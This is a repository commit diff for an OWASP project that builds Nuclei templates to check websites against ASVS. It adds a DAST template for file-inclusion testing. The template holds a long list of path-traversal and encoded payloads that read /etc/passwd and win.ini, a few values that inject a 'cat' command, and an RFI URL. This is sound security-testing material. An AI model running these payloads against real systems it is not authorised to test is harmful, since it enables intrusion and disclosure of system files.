Create 5.3.9.yaml

index.md

@@ -2,18 +2,43 @@
 
 layout: col-sidebar
 title: OWASP ASVS Security Evaluation Templates with Nuclei
-tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates asvs asvs-evaluation PoC-generator vulnerablity 
+tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates ASVS asvs-evaluation PoC-generator vulnerablity automation WSTG pentest
 level: 2
 type: tool
 pitch: This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites.
 
 ---
+[![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml)
+[![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml)
+[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/)
+![Github stars ASVS](https://img.shields.io/github/stars/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei?style=social)
 
-This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites and will involve creating templates that can be used to evaluate ASVS on websites, documenting the use of the templates, and designing and implementing a user interface for easy navigation and use of the templates. The templates and user interface will be tested for accuracy and usability, and once finalized, they will be made available for use. User feedback and usage of the templates and user interface will be monitored and analyzed, and updates will be made to the templates and user interface based on this feedback and usage. Finally, the project will be documented for future reference.
+<p align="center">
+<img src="https://github.com/user-attachments/assets/8f0b666e-a54c-45e9-9f33-4fa414fb122e">
+</p>
 
-It's important to note that Since the implementation methods and frameworks used in web application design are very diverse, in this project, we will consider the existing best practice designs and develop nuclei templates based on them.
+# OWASP ASVS Security Evaluation Templates with Nuclei
+
+
+This project aims to develop  [Nuclei](https://github.com/projectdiscovery/nuclei) templates for evaluating OWASP Application Security Verification Standard ([ASVS](https://owasp.org/www-project-application-security-verification-standard/)) on websites and will involve creating templates that can be used to evaluate ASVS on websites, documenting the use of the templates, and designing and implementing a user interface for easy navigation and use of the templates. 
+
+ The goal is to provide security professionals with an easy-to-use set of tools to test their web applications and identify potential vulnerabilities.
+#### It's important to note that:
+- Since the implementation methods and frameworks used in web application design are very diverse, in this project we will consider the existing best practice designs and develop nuclei templates based on them :)
+- Also while these Nuclei templates are designed to help automate the process of evaluating web applications against ASVS requirements, they should not be considered a substitute for manual testing or other security best practices.
+- Some templates are developed for a limited or specific scenario and should be modified and perfected according to the needs of the evaluator/user.
 
 ## Licensing
 [![alt-text](https://img.shields.io/github/license/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/LICENSE)
 
 This program is free software: You can redistribute it and/or modify it under the terms of the MIT License.
+
+## Contributing
+
+Contributions to this repository are welcome and encouraged. If you have created new Nuclei templates that evaluate additional ASVS requirements or have any idea about current templates, we'd love to hear from you in project Github [Discussions](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/discussions) or our [Slack channel](https://owasp.slack.com/archives/C052939BZ43). 
+
+For detailed information and guidelines about contributing in developing template for ASVS evaluation, please check [CONTRIBUTING.md](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/CONTRIBUTING.md)
+
+#### Core Team
+The project current core team are:
+- [Hamed Salimain](https://github.com/Snbig)  (Project Leader)

info.md

@@ -1,23 +1,21 @@
-### Project Information
-* [Incubator Project](#)
-* [Version 0.0.0](#)
+### Source in Github
+* [🏡 Homepage](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)
+* [📝 Templates](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/tree/main/templates)
+* [🎯 Vulnerable Pages](https://github.com/Snbig/Vulnerable-Pages)
 
-### Classification
-* <i class="fas fa-tools" style="color:#233e81;"></i> Tool
-
-### Audience
-* <i class="fas fa-shield-alt" style="color:#233e81;"></i> Defender
-* <i class="fas fa-hammer" style="color:#233e81;"></i> Breaker
+### Project Classification
+* <i class="fas fa-egg" style="font-size: 1.2em; color:#2ADA08;"></i><span style="font-size:1.0em;padding-left:12px;">Incubator Project</span>
+* <i class="fas fa-shield-alt" style="font-size: 1.2em; color:#233e81;"></i><span style="font-size:1.0em;padding-left:12px;">Defender</span>
+* <i class="fas fa-user-secret" style="font-size: 1.2em; color:#233e81;"></i><span style="font-size:1.0em;padding-left:12px;">Breaker</span>
 
 ### Community
 * [Slack Channel](https://owasp.slack.com/archives/C052939BZ43)
 
 ### Statistics
-* [Daily Project Stats](#)
-
-### Code Repository
-* [repo](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)
+[![Commits](https://img.shields.io/github/commit-activity/m/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei?style=flat&link=https%3A%2F%2Fgithub.com%2FOWASP%2Fwww-project-asvs-security-evaluation-templates-with-nuclei%2Fcommits%2Fmain%2F)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/commits/main/)
 
 ### Change Log
-* [changes](#)
+[![Open PRs](https://img.shields.io/github/issues-pr/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei?style=flat&link=https%3A%2F%2Fgithub.com%2FOWASP%2Fwww-project-asvs-security-evaluation-templates-with-nuclei%2Fpulls)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/pulls)
+
+[![Closed PRs](https://img.shields.io/github/issues-pr-closed/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei?style=flat&link=https%3A%2F%2Fgithub.com%2FOWASP%2Fwww-project-asvs-security-evaluation-templates-with-nuclei%2Fpulls%3Fq%3Dis%253Apr%2Bis%253Aclosed)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/pulls?q=is%3Apr+is%3Aclosed)
 

templates/9.1.3.yaml

@@ -45,4 +45,4 @@
       - type: json
         json:
           - " .tls_version"
-# digest: 4b0a00483046022100ad668aabd5f22ba949265c214a22dd6393fc9d65118f5551704be20c9791b4fa022100a7d26f7b256f003b8db0d8794e22f7e63f051f5674b5ff4ed8a01b6cfa8787e3:236a7c23afe836fbe231d6e037cff444
+# digest: 4b0a00483046022100e28690ed9b4e02b2f1b32d3e5fea4266b8aea6d668d35365ed9e94ad9515ae8e022100e25e0fd48313f9be115c8f93bb91dc18ad74ebf1997576b72c99e810ac804570:236a7c23afe836fbe231d6e037cff444

templates/dast/5.3.9.yaml

@@ -0,0 +1,144 @@
+id: ASVS-4-0-3-V5-3-9
+
+info:
+  name: ASVS 5.3.9 Check
+  author: AmirHossein Raeisi
+  severity: high
+  classification:
+    cwe-id: CWE-829
+  reference:
+    - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
+    - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_9/
+    - https://github.com/projectdiscovery/nuclei-templates/tree/main/dast/vulnerabilities/lfi
+    - https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/
+    - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion
+  tags: asvs,5.3.9
+  description: |
+    Verify that the application protects against Local File Inclusion (LFI) or Remote File Inclusion (RFI) attacks.
+  metadata:
+    max-request: 90
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      LFI-RFI:
+        # LFI (Linux)
+        - '/etc/passwd'
+        - '../etc/passwd'
+        - '../../etc/passwd'
+        - '../../../etc/passwd'
+        - '/../../../../etc/passwd'
+        - '../../../../../../../../../etc/passwd'
+        - '../../../../../../../../etc/passwd'
+        - '../../../../../../../etc/passwd'
+        - '../../../../../../etc/passwd'
+        - '../../../../../etc/passwd'
+        - '../../../../etc/passwd'
+        - '../../../etc/passwd'
+        - '../../../etc/passwd%00'
+        - '../../../../../../../../../../../../etc/passwd%00'
+        - '../../../../../../../../../../../../etc/passwd'
+        - '/../../../../../../../../../../etc/passwd^^'
+        - '/../../../../../../../../../../etc/passwd'
+        - '/./././././././././././etc/passwd'
+        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
+        - '..\..\..\..\..\..\..\..\..\..\etc\passwd'
+        - '/..\../..\../..\../..\../..\../..\../etc/passwd'
+        - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
+        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
+        - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
+        - '%252e%252e%252fetc%252fpasswd'
+        - '%252e%252e%252fetc%252fpasswd%00'
+        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
+        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
+        - '....//....//etc/passwd'
+        - '..///////..////..//////etc/passwd'
+        - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
+        - '%0a/bin/cat%20/etc/passwd'
+        - '%00/etc/passwd%00'
+        - '%00../../../../../../etc/passwd'
+        - '/../../../../../../../../../../../etc/passwd%00.jpg'
+        - '/../../../../../../../../../../../etc/passwd%00.html'
+        - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
+        - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '\\'/bin/cat%20/etc/passwd\\''
+        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+        # LFI (Windows)
+        - '\WINDOWS\win.ini'
+        - '../../windows/win.ini'
+        - '....//....//windows/win.ini'
+        - '../../../../../windows/win.ini'
+        - '/..///////..////..//////windows/win.ini'
+        - '/../../../../../../../../../windows/win.ini'
+        - './../../../../../../../../../../windows/win.ini'
+        - '..%2f..%2f..%2f..%2fwindows/win.ini'
+        - '\WINDOWS\win.ini%00'
+        - '\WINNT\win.ini'
+        - '\WINNT\win.ini%00'
+        - 'windows/win.ini%00'
+        - '/...\...\...\...\...\...\...\...\...\windows\win.ini'
+        - '/.../.../.../.../.../.../.../.../.../windows/win.ini'
+        - '/..../..../..../..../..../..../..../..../..../windows/win.ini'
+        - '/....\....\....\....\....\....\....\....\....\windows\win.ini'
+        - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'
+        - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'
+        - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'
+        - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+        - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+        - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
+        - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
+        - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'
+        - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+        - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'
+        - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
+        - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'
+        - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'
+        - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
+        - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'
+        - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
+        - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
+        - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini'
+        - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'
+        - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
+        - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'
+        - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'
+          # RFI
+        - "https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/rfi.txt"
+    fuzzing:
+      - part: query
+        type: replace # replaces existing parameter value with fuzz payload
+        mode: multiple # replaces all parameters value with fuzz payload
+        fuzz:
+          - '{{LFI-RFI}}'
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:'
+
+      - type: word
+        part: body
+        words:
+          - "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a"
+# digest: 4b0a00483046022100b3629f17d8650d25acbacc2d85fae5ad2c1cecf14c89bb28701ce2c7011ffe05022100a6db4746322beb7989b39c1b04fb416b31f02ac55a9690507e46a62ae93f2ac5:236a7c23afe836fbe231d6e037cff444